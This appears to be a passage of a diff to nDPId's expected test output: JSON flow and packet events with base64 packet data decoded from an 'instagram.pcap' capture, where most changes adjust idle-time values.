+00816{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"instagram.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1436720901262,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":324,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":324,"pkt_l4_len":290,"thread_ts_msec":1436720901262,"pkt":"ABsv8H60QPMIw47hCABFAAE2VBZAAEAGt67AqABnUlUamZHmAFCdoJYSxR9Z0oAYDfbnvwAAAQEICgAD66tZ6cc2R0VUIC9ocGhvdG9zLWFrLXhmYTEvdDUxLjI4ODUtMTUvZTM1LzExMjQ4ODI5Xzg1Mzc4MjEyMTM3Mzk3Nl85MDk5MzY5MzRfbi5qcGc\/c2U9NyBIVFRQLzEuMQ0KSG9zdDogcGhvdG9zLWEuYWsuaW5zdGFncmFtLmNvbQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogSW5zdGFncmFtIDcuMS4xIEFuZHJvaWQgKDE5LzQuNC4yOyA0ODBkcGk7IDEwODB4MTkyMDsgc2Ftc3VuZzsgR1QtSTk1MDU7IGpmbHRlOyBxY29tOyBpdF9JVCkNCg0K"} +00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":262,"source":"instagram.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720901262,"flow_last_seen":1436720901262,"flow_idle_time":7560000,"flow_min_l4_payload_len":258,"flow_max_l4_payload_len":258,"flow_tot_l4_payload_len":258,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1436720901262,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.153","src_port":37350,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-a.ak.instagram.com","url":"photos-a.ak.instagram.com\/hphotos-ak-xfa1\/t51.2885-15\/e35\/11248829_853782121373976_909936934_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":303,"source":"instagram.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720906017,"flow_last_seen":1436720906017,"flow_idle_time":180000,"flow_min_l4_payload_len":103,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1436720906017,"l3_proto":"ip4","src_ip":"192.168.0.106","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00592{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"instagram.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1436720906017,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":145,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":145,"pkt_l4_len":111,"thread_ts_msec":1436720906017,"pkt":"\/\/\/\/\/\/\/\/ABZEH1lmCABFAACDA5AAAIARdcjAqABq\/\/\/\/\/0RcRFwAb\/+ueyJob3N0X2ludCI6IDQxMzc2NzExNiwgInZlcnNpb24iOiBbMSwgOF0sICJkaXNwbGF5bmFtZSI6ICIiLCAicG9ydCI6IDE3NTAwLCAibmFtZXNwYWNlcyI6IFsyMDA5Mjk0MDNdfQ=="} 00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":303,"source":"instagram.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720906017,"flow_last_seen":1436720906017,"flow_idle_time":180000,"flow_min_l4_payload_len":103,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1436720906017,"l3_proto":"ip4","src_ip":"192.168.0.106","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} @@ -52,193 +52,193 @@ 00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":306,"source":"instagram.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720906022,"flow_last_seen":1436720906022,"flow_idle_time":180000,"flow_min_l4_payload_len":103,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1436720906022,"l3_proto":"ip4","src_ip":"192.168.0.106","dst_ip":"192.168.0.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":308,"source":"instagram.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720906025,"flow_last_seen":1436720906025,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1436720906025,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.0.255","src_port":520,"dst_port":520,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":308,"source":"instagram.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1436720906025,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720906025,"pkt":"\/\/\/\/\/\/\/\/ABsv8H60CABFAAA0BsVAAEARsaPAqAABwKgA\/wIIAggAILagAgEAAAACAADAqAAAAAAAAAAAAAAAAAAB"} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":309,"source":"instagram.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720906070,"flow_last_seen":1436720906070,"flow_idle_time":7440000,"flow_min_l4_payload_len":613,"flow_max_l4_payload_len":613,"flow_tot_l4_payload_len":613,"flow_avg_l4_payload_len":613,"midstream":1,"thread_ts_msec":1436720906070,"l3_proto":"ip4","src_ip":"31.13.93.52","dst_ip":"192.168.0.103","src_port":443,"dst_port":33934,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01304{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":309,"source":"instagram.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1436720906070,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":679,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":679,"pkt_l4_len":645,"thread_ts_msec":1436720906070,"pkt":"QPMIw47hABsv8H60CABFAAKZYWZAAFUGhKgfDV00wKgAZwG7hI6seG5hv38UHoAYAGuTKQAAAQEICltMYqkAA+18FwMBAmCl7hwsC927JcFSAZYWLzz9PCOE13q\/R1R\/4Ep\/l7+HHbIpOFFcCYs42I3wFOgWiBw3wjx3pJOgTGydZF67jt6\/BKND+v8oyfRpnqlS5YMAWUNymHV7uHWxp+hxonkw6cNC93nRZtrxzkz6LP0NT0kghBPZC1Qj+5R6TJU9O4JNVgnaOk7a2PLjjlpxNviWyDprqQXVx0ggqtiTSBMr7Uc5EfDpzAAkL4Ijs+Gp7u5RRsTL\/vjjpIbFtLB91jbWUmuE049zO8Z0ZXe+NUKtpOUeDZz+3zpQ7uf3ydorfitQX7zdybIk3\/bzSVhOShF3BJrYBLAD2AQ24us0\/KfVGECFrd6OK2BQqjf6ncI9qOXNwiVF\/2inbzY\/Q3OsYRcS7XHEaq0O5REHcT8SzE5VoLX4XXQtBoZwVB5Yrj77GtBQdmGZD6u8UMQpctBx6N9Mr51OWWfdFnAbts6SnZuXGzlYjqJOxS7Vx73Uw8fCkf1IEri8UI1qbM9veDNciQdo3CmVyvU7iM87rUz7C0f+A4f1opsUJ5+EheBr1eGc36Efb4\/Ualnnz3nkJR3hncStDick4US+OxlgvGof266YJgZuAwCGxYg4vW2knDKYz5umzCws7lIHpIdAFNPByVtoUTPTPQS5UKgIEdb95j7F6DccGwtWvRW1Al5LucPJI7zWS2dtNSdT\/Ojj1Rno0QRGwZ45j0In5POotAgCjk30MTwIN5HhcpigFfTCmuPMsYmTn6MoC7DboyOfYCjSc6fhkNqfZ2xyKSzKyqklgdTHeGfRwO+op5ygRsksmKTJ1Q\/4mw=="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":310,"source":"instagram.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1436720906070,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720906070,"pkt":"ABsv8H60QPMIw47hCABFAAA0Ga9AAEAG48TAqABnHw1dNISOAbu\/fxQerHhwxoAQAW09dwAAAQEICgAD7YxbTGKp"} -01772{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"instagram.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1436720908201,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1015,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1015,"pkt_l4_len":981,"thread_ts_msec":1436720908201,"pkt":"ABsv8H60QPMIw47hCABFAAPpGbBAAEAG4A7AqABnHw1dNISOAbu\/fxQerHhwxoAYAW1v8wAAAQEICgAD7mFbTGKpFwMBA7AOHMI1ALyiYU3ya6qg+prWQI\/n9ANspqMl7L4ePI46MbeMU\/IIKBcoHTRp\/G5Sihc5nIJHuC2+37mEcl691gW4u\/TM4cTkpTf1jvX2GQ4y6\/txghh7z8FoXfNbqCHIq72qOYxX78zowj+FiMRcWPEmeWcWoH+gdWfhPA\/lkpOWh7PAWcTM6YhVbfKMzFVog0eNO6nAQ6Db4QV49GBIVCzfrXCBVeXZAcW0CL72bBYmhxsuCeKWPO3s6v5st61\/TqBX2wKyuhuh0iYRoQoS\/wYMoppq1iw5UM\/55LosXWjVhX+LnpSLv52m8IfyQkh1vrv+SJ7KjFgIF5haejMGRgEB6k28tUeT6FGaiUo32klBF\/ovhJ\/7PzYE5+p1Zs2WdUsskxD79HTvK6ta+oXXgI8zxnT+FY6f4Y3Qg+b6yTS68sbWyHT6\/PezdvhWfHtL0SSgHp8goibROD\/tT\/ewXwhvrOEixGKhip+cFDAiL8AxMi3V3Lo6cis85J1puKveGyk09JQyFUAk\/2r5Yl++ASyNB2yelevEI5wg+VsEb8Rcm\/QA7noQyfs1T5YOnO8NCBiPmye5eIk\/wZxnX1f+2xdUrgycDikO6k0cQg3utcfRP10t4qmvTrg2ek70WkuE+ATLg2Um1eRaeb81BxGpDBojTreWbcm5dcICJMpu5Jn\/w\/\/OFgLDd8zIcqEDUouT6ZCScciar49BKHurWy8NKFla9SI75KJQz9yq3QZyAG0rJc2lhQMyl9+7b4Ogizx8Jo29kTu8fZJSlg+ABrC1jcExXQD49OmAnZxwfKy6D2pC9Rse0qtqmzV+ovVEbJp+oxkyoXka2nmc36kfQhlZgI7KVixFLMTTlCevMnYrq1xJ\/MKzvCd6IWf+N5EocWD+ilOqptHNEIAOXJmgXODhL5KGWjQb8\/91W1IyUi6q\/ngSGvVRUpY8iujk6L\/C+Bbj\/Dm4AkcumBcragxaghvlWXmc47QSkqomVkZppr19doVE596Z\/iAcdVNMq1wy+2v27UYh5CMr3l5X59P07fb7g36BHbE7SHRjrHyy9CTFMxhEf0YgUq5TdIHDFI5lE\/KxLNZVidU3ki5Un7VFtJrfQka6os1jVOGfB9pUZq5Qsmwf1i\/ygu+C28zlN53MQWP6wHjI3WJZUBr81SukNH57IK2c2EyIu0E+HAgTgoJHe51A\/fUmZ1cYv7+JWrlM8pRHdKg4V83a8+0QRZUGb14qwNk4zB82iOuTyKlfeqGDo1mtsQ=="} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":312,"source":"instagram.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908216,"flow_last_seen":1436720908216,"flow_idle_time":7440000,"flow_min_l4_payload_len":949,"flow_max_l4_payload_len":949,"flow_tot_l4_payload_len":949,"flow_avg_l4_payload_len":949,"midstream":1,"thread_ts_msec":1436720908216,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33935,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01761{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":312,"source":"instagram.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1436720908216,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1015,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1015,"pkt_l4_len":981,"thread_ts_msec":1436720908216,"pkt":"ABsv8H60QPMIw47hCABFAAPpl5BAAEAGYi7AqABnHw1dNISPAbuBQH+NqOzE9YAYAR7+6wAAAQEICgAD7mJbGFWXFwMBA7DGXKcxYYzj4PsFQPMmYQehh8iuvFDU6ChyMypfRInDCFuixSLIKOq63dIUv38njMJN2kVy\/t+T8m9xPVbEGAFdD3PpSc3SZZnBHiv5tCRNZzMhDLWXPkOIN9Lutipqd5IVnEEsBFkO\/fZ2K81T8PYPXOUELo\/sV11FwruvuAKdrrJSJDxsNb8ZavjfuhrjTCNZ8992aq+Ku9jOSU4Xa7Q\/BYCty1PvPxxBeD0eYCG+tOtkysHtjUZlr1d4OQxDr\/61YS0x9iJOXjnMBoobCu17VKBkd2hUXNptzi\/uIUhzamB9Rremxs\/xa5ErUN6bjCfTqClJMKTo2+EPLLC2OrnUwhZPfwAqX4LMjZxrO4OjWeKTq0PJEWrYJt\/hZgR9r16F85siGrf6FK1kTDvb0+vybKakTv5L4R+tKZVBNuaZabfxVkkl5TNMskAuzgaRl4NAmD9vaxsUvWa1r1eavZpU2b4i3TllipunjR4aQEFb47bl0X9Ru9Hl1x54J53nJ+MJknrPmdJbHBa5kRwAqKgaQptXtnMz1WTWV+Q8a53Upaic+O0txvujdC90+KUOiiTbhfTw0gAmNmPQmi2l+V2tphQpp2jEsWxETCl2LSUnlcR9XDLGnBO3KYnN9C0+k2yBKCMObHAcOzwdJWheAOhMNBVSNpFtrfOE6uSTsVbDj23xeCxxC1QAM7YJmxoVRhtdVyIDYYANmHTFeA\/uC6oLDeExrKyQP7kSEfNbdUqTNPu\/MJKIjJDZu1yLmyvi1O\/nGho5EDKw8IVXPxnfKKPvaQH2GtI88pEfGeAEyC\/HE\/tmFwWll7dh2qPp5A3wF8sKJ3O0eDAbcGfPED7oJA+EsxJAhKT6isvErCueBtWMHVSeiLsoME8tf6cS9zzgnk33LczZTQgm29MSHE7ZL2GeiGbzuGwrTGDnk1VDLJRove2wMug8H7\/TzDu7ltmYb22OyZHWPR+qBc0SXnC41HvKpdG4l5lloyRu51PXhn1Z4SBmRKxgHOd10WPpGH9Et\/GeMS7LFYrc7oqcb6G7UCvo5VgI1SuJrJeY0vV2tCM0MyJYykeRmE4\/7F1xpcmuoE1e5ET3+6eiLGpqXUS7VkABwgQafZxjQScCWI5pekzUYOfjX5epPROl\/DzQKTCdpj3Gvhf2XBY54ImjWPLE32kUQllKDfXNIYtYFjXJbjsc4Zka4\/X4kGWgbCWN+dmnakKME8cbt\/+4rEk8PQFIv1W4FPcpki7hccXc0xhFEqm0Sw=="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":315,"source":"instagram.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1436720908259,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908259,"pkt":"QPMIw47hABsv8H60CABFAAA0u1VAAFUGLR4fDV00wKgAZwG7hI+o7MT1gUCDQoAQAFyKzgAAAQEIClsYbBQAA+5i"} -02366{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":325,"source":"instagram.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1436720908432,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":1436720908432,"pkt":"QPMIw47hABsv8H60CABFAAWqu1ZAAFUGJ6cfDV00wKgAZwG7hI+o7MT1gUCDQoAQAFzmhwAAAQEIClsYbL0AA+5iFwMBBgCkPdU4R6wGSIS3keHeixTLTI9zV+il0PpZ8q91YamIsd4IZ1iA9S2D6W\/nJ4T6403w2+fJe+hdEKNsk0963CdXOEXDNkQKpXOBBE+0Y\/4Fle8ueshRyGFFEoc6PtZpKpwayy+TKxEJ4pFJyX2oGMWjaZzaOyD59AskeV\/YOll+Xm0S27uMjZKkLBkCxDNPTNhB8fh\/syM9nxdE4huEu1SgtsgSRap7+5OfSJa0vJji4Lac5HIGGpVuCAdsaWkkirxUeGhBT5KqUaH3z34YK2q9OCFDjG6zQx+K5wB6\/1tRpCV4T0Wdq9iazWqTK9fhu3Q8m7M+n+OlMsKGxDIEQhTmUFv6EsILdWY4XaXzsNt68ilI12u8FIErHj5xADP5BSss+D\/PqbyyYfj1siM7kMLTpiPXuCUljd29w+P7wtJOUzlqcHwFv60jtkmE5R7DR9LN47rlhx2ZgEX8b9nsvGl\/Z1KSCJ1m3XV6f0806axX94l9imfNEVAHweCX3kOlfFNWODbpNzNbLbpVtPn7xKRA5Y140DajcNQvyREJ7DrHWIxbEPKUq+SIMaNEJqDkl0rYnPqvJYuixcmcTK6joyocw7sF+MmuWuJzAwYoGvQacoqaNqOp0iEPlyz8x6cTF7HbzVKHlLYHsfsKMGz98miVsnjvci5f7S+qZN8wJt+ycMpErrmm5SYVwnyDiARUnY01FjBiu7oXosmSU8r8tl1Y7oQcefwWQmUMJwEVoICnXk5o\/1P1fTAJawMxQor10OxDf\/BV8+4BnkZNbktKhC4u6rpy4t9mTFTFoJnekuOgtsyuYF1D1pTovQynkNog8sbNDLg6lOVy2sSjtN38M5BrjfWP6NvWf5rAbsDm9Qvw2VUkrLm+vXfuLJeKqhTOHspJB2ZVScw6fgqCCRgXV4hbT47jXkZHPFeUj3xtv5oznldP1XEp\/Y0YyZnWCMaWATZlGVUiSYeiFbrcd70L0WujcTQSesgJzHbOqeptYMiDDVIYXi5utFDZis9FPZA2ul\/lArmvEL\/urLFDKdnXMnNjyIIqJtwWZlcpDAHOfD2KyMM51NtnpD3NXBz6ngCZNoi3DrWeJbaK2NX4FFrr9nkmfuHb0MCV8zapTpFVeDqmiCnEMr1A22q06nZsJij0BS+jpAlud6+DjOPKWljFzy06Xn15YGW3Dm07Vi1rGNQXnlLIYZbH\/Lf9VbK8rn+tf2U4X+kmR\/seSiHTIiCrfQRY82NcG+s2JE\/3RNuUUsdP3+A8UZATxsKmMNb9p9jduLcV5NSz3qcz\/E+TORnhzC5qM5iDlSbThKZAPEgvS54QGz00rdEYWdvIwL1jLd2l2yP9aEoOWrH+sNsRBCU97PG1IRhRS5jctVYyDntPEBlAbqGj6sdT5C6POfN9JdpaIsZmGaMmnU0z4bjokazZ5F6F501SFGcsFKmgoCdZLCQyyA\/CkkbqEF1LeEPM1KkE88DAsVjRhjRCz9D6VKRt8PZdtywXXp7E7yF8+4SN\/2h5CqHv4N+v+ejLyvCd2t1L4BFuJ7BTwaB6NicxBq3cWSEeADsWxC4xODPl+fmk90gThIrGh3\/E3G\/K8LjJkXPwBqDPoSCAh\/lyvY4cI9USKSjdTboTHfChgT73IzMJk4MESnvGhexHkwWw4ndKaJ88XZfXiGJCI\/GHCwJX7Zu\/IG7bV7st4TnImk\/Ds\/xEG7y3JgmTAc9wIRPfDmTaMW0XI0vpt5j1BnCLq+es4TBuh9vggrd8U5G3S+2hj2u1HQPo3wjRAM4dNo6in8nnmD4n\/\/G9yrHWQwizkMQMUhZbY0jDslavyFSGnWc0JVIhfEzkCZm+lGdYxoDPUYKjjFRFeJ8o"} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":309,"source":"instagram.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720906070,"flow_last_seen":1436720906070,"flow_idle_time":7560000,"flow_min_l4_payload_len":613,"flow_max_l4_payload_len":613,"flow_tot_l4_payload_len":613,"flow_avg_l4_payload_len":613,"midstream":1,"thread_ts_msec":1436720906070,"l3_proto":"ip4","src_ip":"31.13.93.52","dst_ip":"192.168.0.103","src_port":443,"dst_port":33934,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01304{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":309,"source":"instagram.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1436720906070,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":679,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":679,"pkt_l4_len":645,"thread_ts_msec":1436720906070,"pkt":"QPMIw47hABsv8H60CABFAAKZYWZAAFUGhKgfDV00wKgAZwG7hI6seG5hv38UHoAYAGuTKQAAAQEICltMYqkAA+18FwMBAmCl7hwsC927JcFSAZYWLzz9PCOE13q\/R1R\/4Ep\/l7+HHbIpOFFcCYs42I3wFOgWiBw3wjx3pJOgTGydZF67jt6\/BKND+v8oyfRpnqlS5YMAWUNymHV7uHWxp+hxonkw6cNC93nRZtrxzkz6LP0NT0kghBPZC1Qj+5R6TJU9O4JNVgnaOk7a2PLjjlpxNviWyDprqQXVx0ggqtiTSBMr7Uc5EfDpzAAkL4Ijs+Gp7u5RRsTL\/vjjpIbFtLB91jbWUmuE049zO8Z0ZXe+NUKtpOUeDZz+3zpQ7uf3ydorfitQX7zdybIk3\/bzSVhOShF3BJrYBLAD2AQ24us0\/KfVGECFrd6OK2BQqjf6ncI9qOXNwiVF\/2inbzY\/Q3OsYRcS7XHEaq0O5REHcT8SzE5VoLX4XXQtBoZwVB5Yrj77GtBQdmGZD6u8UMQpctBx6N9Mr51OWWfdFnAbts6SnZuXGzlYjqJOxS7Vx73Uw8fCkf1IEri8UI1qbM9veDNciQdo3CmVyvU7iM87rUz7C0f+A4f1opsUJ5+EheBr1eGc36Efb4\/Ualnnz3nkJR3hncStDick4US+OxlgvGof266YJgZuAwCGxYg4vW2knDKYz5umzCws7lIHpIdAFNPByVtoUTPTPQS5UKgIEdb95j7F6DccGwtWvRW1Al5LucPJI7zWS2dtNSdT\/Ojj1Rno0QRGwZ45j0In5POotAgCjk30MTwIN5HhcpigFfTCmuPMsYmTn6MoC7DboyOfYCjSc6fhkNqfZ2xyKSzKyqklgdTHeGfRwO+op5ygRsksmKTJ1Q\/4mw=="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":310,"source":"instagram.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1436720906070,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720906070,"pkt":"ABsv8H60QPMIw47hCABFAAA0Ga9AAEAG48TAqABnHw1dNISOAbu\/fxQerHhwxoAQAW09dwAAAQEICgAD7YxbTGKp"} +01772{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"instagram.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1436720908201,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1015,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1015,"pkt_l4_len":981,"thread_ts_msec":1436720908201,"pkt":"ABsv8H60QPMIw47hCABFAAPpGbBAAEAG4A7AqABnHw1dNISOAbu\/fxQerHhwxoAYAW1v8wAAAQEICgAD7mFbTGKpFwMBA7AOHMI1ALyiYU3ya6qg+prWQI\/n9ANspqMl7L4ePI46MbeMU\/IIKBcoHTRp\/G5Sihc5nIJHuC2+37mEcl691gW4u\/TM4cTkpTf1jvX2GQ4y6\/txghh7z8FoXfNbqCHIq72qOYxX78zowj+FiMRcWPEmeWcWoH+gdWfhPA\/lkpOWh7PAWcTM6YhVbfKMzFVog0eNO6nAQ6Db4QV49GBIVCzfrXCBVeXZAcW0CL72bBYmhxsuCeKWPO3s6v5st61\/TqBX2wKyuhuh0iYRoQoS\/wYMoppq1iw5UM\/55LosXWjVhX+LnpSLv52m8IfyQkh1vrv+SJ7KjFgIF5haejMGRgEB6k28tUeT6FGaiUo32klBF\/ovhJ\/7PzYE5+p1Zs2WdUsskxD79HTvK6ta+oXXgI8zxnT+FY6f4Y3Qg+b6yTS68sbWyHT6\/PezdvhWfHtL0SSgHp8goibROD\/tT\/ewXwhvrOEixGKhip+cFDAiL8AxMi3V3Lo6cis85J1puKveGyk09JQyFUAk\/2r5Yl++ASyNB2yelevEI5wg+VsEb8Rcm\/QA7noQyfs1T5YOnO8NCBiPmye5eIk\/wZxnX1f+2xdUrgycDikO6k0cQg3utcfRP10t4qmvTrg2ek70WkuE+ATLg2Um1eRaeb81BxGpDBojTreWbcm5dcICJMpu5Jn\/w\/\/OFgLDd8zIcqEDUouT6ZCScciar49BKHurWy8NKFla9SI75KJQz9yq3QZyAG0rJc2lhQMyl9+7b4Ogizx8Jo29kTu8fZJSlg+ABrC1jcExXQD49OmAnZxwfKy6D2pC9Rse0qtqmzV+ovVEbJp+oxkyoXka2nmc36kfQhlZgI7KVixFLMTTlCevMnYrq1xJ\/MKzvCd6IWf+N5EocWD+ilOqptHNEIAOXJmgXODhL5KGWjQb8\/91W1IyUi6q\/ngSGvVRUpY8iujk6L\/C+Bbj\/Dm4AkcumBcragxaghvlWXmc47QSkqomVkZppr19doVE596Z\/iAcdVNMq1wy+2v27UYh5CMr3l5X59P07fb7g36BHbE7SHRjrHyy9CTFMxhEf0YgUq5TdIHDFI5lE\/KxLNZVidU3ki5Un7VFtJrfQka6os1jVOGfB9pUZq5Qsmwf1i\/ygu+C28zlN53MQWP6wHjI3WJZUBr81SukNH57IK2c2EyIu0E+HAgTgoJHe51A\/fUmZ1cYv7+JWrlM8pRHdKg4V83a8+0QRZUGb14qwNk4zB82iOuTyKlfeqGDo1mtsQ=="} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":312,"source":"instagram.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908216,"flow_last_seen":1436720908216,"flow_idle_time":7560000,"flow_min_l4_payload_len":949,"flow_max_l4_payload_len":949,"flow_tot_l4_payload_len":949,"flow_avg_l4_payload_len":949,"midstream":1,"thread_ts_msec":1436720908216,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33935,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01761{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":312,"source":"instagram.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1436720908216,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1015,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1015,"pkt_l4_len":981,"thread_ts_msec":1436720908216,"pkt":"ABsv8H60QPMIw47hCABFAAPpl5BAAEAGYi7AqABnHw1dNISPAbuBQH+NqOzE9YAYAR7+6wAAAQEICgAD7mJbGFWXFwMBA7DGXKcxYYzj4PsFQPMmYQehh8iuvFDU6ChyMypfRInDCFuixSLIKOq63dIUv38njMJN2kVy\/t+T8m9xPVbEGAFdD3PpSc3SZZnBHiv5tCRNZzMhDLWXPkOIN9Lutipqd5IVnEEsBFkO\/fZ2K81T8PYPXOUELo\/sV11FwruvuAKdrrJSJDxsNb8ZavjfuhrjTCNZ8992aq+Ku9jOSU4Xa7Q\/BYCty1PvPxxBeD0eYCG+tOtkysHtjUZlr1d4OQxDr\/61YS0x9iJOXjnMBoobCu17VKBkd2hUXNptzi\/uIUhzamB9Rremxs\/xa5ErUN6bjCfTqClJMKTo2+EPLLC2OrnUwhZPfwAqX4LMjZxrO4OjWeKTq0PJEWrYJt\/hZgR9r16F85siGrf6FK1kTDvb0+vybKakTv5L4R+tKZVBNuaZabfxVkkl5TNMskAuzgaRl4NAmD9vaxsUvWa1r1eavZpU2b4i3TllipunjR4aQEFb47bl0X9Ru9Hl1x54J53nJ+MJknrPmdJbHBa5kRwAqKgaQptXtnMz1WTWV+Q8a53Upaic+O0txvujdC90+KUOiiTbhfTw0gAmNm